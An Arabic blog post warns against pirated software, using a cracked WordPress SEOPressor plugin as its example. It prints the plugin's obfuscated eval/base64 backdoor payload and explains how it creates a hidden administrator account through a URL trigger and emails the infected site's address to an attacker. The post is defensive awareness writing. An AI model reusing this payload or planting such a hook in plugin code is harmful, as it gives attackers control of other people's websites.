4

خطر قرصنة البرامج: إضافات ووردبريس مثالا

السلام عليكم ورحمة الله.

نشرتُ قبل مدة قصيرة أول تدوينة تحت تصنيف “توعية رقمية“، اليوم أتبعها بهذه التدوينة التي أرجو ألا تكون الأخيرة في هذا الإطار.

معظم المستخدمين – بما فيهم متخصصون بالتقنية – مهووسون بالمجاني. كراك، سريال وغيرها كلمات من قاموسهم اليومي. فضلا عن الجانب الأخلاقي في القضية – عفوا، ولكن ما تقوم به سرقة – فإن هناك جوانب أخرى، من أهمها الجانب الأمني. هذا الهوس بالمجاني يعمي الكثيرين عن خطر قرصنة البرامج.

ليس عبثا أنك في كثير من الأحيان تحتاج لتعطيل مضاد الفيروسات (لمستخدمي وندوز) قبل التمكن من تشغيل الكراك، فأنت ببساطة تثق في برنامج لا تعرف عنه سوى أنه يمكِّنك من تشغيل برنامج ليست لديك الرغبة في دفع ثمنه، ولكن في بعض الأحيان وربما في أغلبها أنت تدفع ثمنا أغلى من سعر البرنامج الذي تريد التحايل عليه. سيكون لدينا مثال في هذه التدوينة.

مثال على قرصنة البرامج : إضافات ووردبريس المدفوعة

أثناء البحث في تويتر عن التغريدات التي تُنشر عن ووردبريس لفت انتباهي عدة تغريدات تعرض تنزيل بعض قوالب ووردبريس. بعض هذه القوالب متوفر مجانا بلغة أجنبية ثم عُرِّب وبعضها الآخر قوالب عربية متميزة ومشهورة تباع على موقع ثيمفورست وتلقى رواجا كبيرا (أمثلة: قالب صحيفة، قالب اليوم وغيرهما من القوالب والإضافات). شخصيا لم يعجبني توفير جهد الآخرين الذي تعبوا عليه بهذه الطريقة ودون إذن منهم. كانت الأمور ستتوقف هنا لو لم أطالع بعدها بأيام قليلة هذا المقال على مدونة شركة Securi الأمنية، فقررت الكتابة عن الموضوع.

المقال المشار إليه يتحدث بالتفصيل عن المخاطر التي يتعرض لها من يبحث عن طرق ملتوية لتجنب الدفع مقابل الحصول على بعض الخدمات (إضافات ووردبريس في حالتنا هنا). سأعرض هنا لمثال واحد من بينها، ولكنه قابل للتعميم على قرصنة البرامج بشكل عام.

إضافة SEOPressor

سعر الإضافة الأصلية: 47 دولارا. طبعا النسخة المقرصنة مجانية، ولكن دعونا نرى سعرها – أي النسخة المقرصنة – الحقيقي.

أثناء بحث الشركة في موقع أحد عملائها وجدت المجلد التالي (seo-pressor(gratuit ضمن مجلد الإضافات. كلمة gratuit (مجاني) أثارت انتباه الخبراء الأمنيين وجعلتهم يدقّقون أكثر في محتويات هذا المجلد، ليجدوا في النهاية أن ملف PHP التالي central.class.php يحتوي على هذا الكود:

eval (gzinflate( base64 _decode("NdLJlmNQAADQX8muqo6FIKZTXV0HEUKixCybPsIzBOGZHu/ruzf9B3dxd9+/f333Zb8DS9Ls3gtcvfImmcD7IxkBd/
iTgbTLwPublZ2MEZ6RJB1vkD/yYYV8OdYhuTCXwq+1882AVrOXpUJzbr507gkxWLZRYOfc5llCsyRMdIZxv+sW6N0ICq6h6Bm/
5us1pVADcjlCnsm5tttpIWyHnzkwyMqVJTOupEbLBCE50lcVtKnLKc999/JlZDWRcO8yqve1TKRiND7ZXnsJBW5L0zwJVuFQMQmXgTPLNZnw/PCObVCZ+YO56TOih0TzlIvhqgqpH+jUUgfVXVFrVPDRk6eKdDL1aNQgr2J5wB5Z0GErnQ3muWGF6ktS9a27sYinLuRjpUrQK6GktGCw+pMNqVq84FQCnQBKqUw3vjvT6B8ZyJAgDuEcimHia1660nhruAX71qNCOBjmvMw9q6DN4ukIgufPUyQNmX9ao1YPak6p96OGzSZoj86NPlkXEWnUvSBQzJouKDYxdsKoOTDeA3sxP17dWfxxs4S8HyeWkcYWsmMYieaS2TVR0RfOgw2Xygbrv6I03xIkKlQNfGUTmj4wsOgQdvailUayKYpaL8EVwG1aJTgcMufcgbogTeEAtf1pXp6EzYiru0XYPkcCT/I6+vp623187D4+d/+L/QU=")));

الكود أعلاه هو تعمية لجزء من عمل الإضافة. التعمية بحد ذاتها ليست غريبة في الإضافات المدفوعة حيث يُحاول المطور إخفاء طريقة عمل الأجزاء المهمة (خوارزميات مثلا) من الكود المصدري حتى لا يستعمله منافسون آخرون.

في حالتنا هنا حاول الخبراء نزع تعمية هذا الجزء من الكود، وبعد عدة محاولات نجحوا ليكتشفوا أن الكود المصدري بعد نزع التعمية يصبح كما في الصورة أدناه.

خطر قرصنة البرامج، كود PHP بعد نزع التعمية

خطر قرصنة البرامج، كود PHP بعد نزع التعمية

في هذا المقطع تظهر دالتان Functions مربوطتان بالحدث wp_head، أي أنهما ستنفذان مع كل تحميل لصفحة من الموقع.

  • الدالة الأولى ()my_wpfunww7x تُنشئ مستخدما باسم wordpress لديه صلاحيات مدير Administrator وكلمة مروره gh67io9Cjm. هذا الأمر يُنفّذ فقط إذا مررنا المعطى cms بقيمة jjoplmh، مثلا عند طلب الصفحة http://blog.example.com/?cms=jjoplmh.
  • الدالة الثانية ()my_wpfunww7c8 تفحص إذا ما كان يوجد مستخدم باسم wordpress وإن لم يكن موجودا تبعث برسالة إلى البريد thomasza@gmx.com تحوي عنوان الموقع في خانة الموضوع وعبارة WordPress Plugin في محتوى الرسالة.

أظن الأمر أصبح واضحا الآن، وإليكم كيف يشتغل هذا الجزء من كود الإضافة بعد التعديل (طبعا من وفّر لك إمكانية تنزيلها مجانا هو من قام بهذا التعديل):

  • عند تثبيت الإضافة (المقرصنة وليس الأصلية) على موقع، فإن الكود أعلاه يبعث برسالة إلى صاحب البريد thomasza@gmx.com تحوي عنوان الموقع الذي نُصِّبت عليه الإضافة.
  • يأتي المهاجم إلى الموقع (فليكن  www.example.com) ويضيف المُعطى ?cms=jjoplmh إلى العنوان فيصبح www.example.com/?cms=jjoplmh.
  • النتيجة هي أنه بعد طلب العنوان السابق يُنشأ حساب بصلاحيات مدير اسمه wordpress وكلمة سره gh67io9Cjm
  • الآن بإمكان المهاجم الدخول إلى الموقع عبر الحساب أعلاه وفعل ما يريد في الموقع وربما الخادم بأكمله.

في الأخير بدل أن يستفيد صاحبنا مجانا من إضافة متوفرة للبيع بسعر 47 دولارا وضع موقعه تحت سيطرة آخر يفعل به ما يشاء (على موقع http://wplist.org/ أحصت Securi خمس إضافات مدفوعة يعرضها نفس المستخدم الذي وفّر  الإضافة السابقة للتنزيل مجانا ولا شك أنها كلها تحوي نفس الكود الخبيث).

يسترسل المقال المذكور في تعداد حالات أخرى، بعضها مع إضافة لا يتجاوز سعرها 6 دولار! ويطرح في الأخير هذا السؤال هل الأمر يستحق فعلا كل هذا ؟

يكمل المقال بنصيحة موجهة لمن يبحث عن قوالب أو إضافات مدفوعة دون أن يكون مستعدا لدفع ثمنها بأن يتريّث ويفكر في أن سطرا برمجيا واحدا يصعب الانتباه إليه قد يجعل من حماية موقعه في مهب الريح. ينطبق الأمر أيضا على قرصنة البرامج الأخرى وليس فقط القوالب والإضافات.

أود أن أختم بالتشديد على أهمية التأكد من الموقع الذي تنزل منه البرامج أو الإضافات قبل استخدامها ثم حاول قدر الإمكان ألا تستخدم سوى برامج أصلية وتذكّر خطر قرصنة البرامج على أمنك وأمان جهازك أو موقعك فما ستخسره قد يفوق ما كنت ستدفعه ثمنا لتلك البرامج.

تبحث عن قالب أو إضافة لووردبريس ؟ جرب هذه اللائحة (كل واحد من هذه المواقع لديه سياسة مراجعة قبل الموافقة على العنصر):

بهذا أختم هذه التدوينة. أعجبتك؟ لا تدعها تتوقف عندك وشاركها مع أصدقئك عبر أزرار الشبكات الاجتماعية. يمكن أيضا التسجيل في المدونة ومتابعة تغذيات RSS من هنا أو عن طريق تطبيق فيدلي عبر الزر أدناه.

تلميحات تقنية على تطبيق فيدلي

إلى المُلتقى.

فضلًا.. شارك هذا المقال 🙂

Email this to someoneTweet about this on TwitterShare on FacebookShare on Google+Share on StumbleUpon

zeine77

محمد أحمد ولد العيل، مهندس نظم معلومات. مهتم بنظام تشغيل غنو/لينوكس والبرمجيات الحرّة والمفتوحة المصدر. أسعى من خلال هذه المدوّنة لإثراء المحتوى العربي على الشّبكة.

4 Comments

  1. السلام عليكم
    كلامك موزون، هدا يحدث غالبا في القوالب،وجربتها ونجحت معي ، اما الإضافات لم أكن أعلم بدالك وشكرا لتنبيه، للأسف المواد المقرصنة تسيل لعاب الناس وهي تعد فخ مميز للمقرصنين

  2. السلام عليكم
    هل تنصحون مطور مواقع +شخص يعمل مونتاج ب لينوكس ؟ هل هناك من برامج تعادل كامتازيا+ افترايفيكت4 ؟ او هي يمكن ان تعمل لو قمنا بعمل شيئ ما ، سلام

    • وعليكم السّلام ورحمة الله،

      أهلا بك أخي الكريم.
      بالنسبة لمطوّري المواقع ليس هناك أي مانع من انتقالهم إلى لينوكس، أما من يشتغل في مجال التصميم Design والمؤثرات الصوتية فأنصحه بعدم العجلة في الانتقال (لستُ متخصصا، ولكن أغلب من أقرأ لهم من المتخصصين يقولون إن بدائل هذه البرامج ليست بمثل جودتها. هذا لا يعني أنها ليست جيدة ولكن لدى بعض المحترفين متطلبات عالية لا توفرها البرامج البديلة الموجودة على لينوكس).
      نصيحتي هي تجربة البرامج البديلة (مثلا Blender بدلا من After Effects ) على وندوز فلأغلبها إصدارات تعمل على نظام لتشغيل هذا، فإن نالت رضاك يمكن بعدها الانتقال إلى لينوكس بحيث تتوفر على النظامين معا قبل الاستغناء نهائيا عن وندوز.

      شكرا على الزيارة.

  3. السلام عليكم ورحمة الله
    كيف أفحص الثيم وأتاكد من عدم وجود اي ثغرات ؟

    شكرا

اترك تعليقاً

لن يتم نشر عنوان بريدك الإلكتروني. الحقول الإلزامية مشار إليها بـ *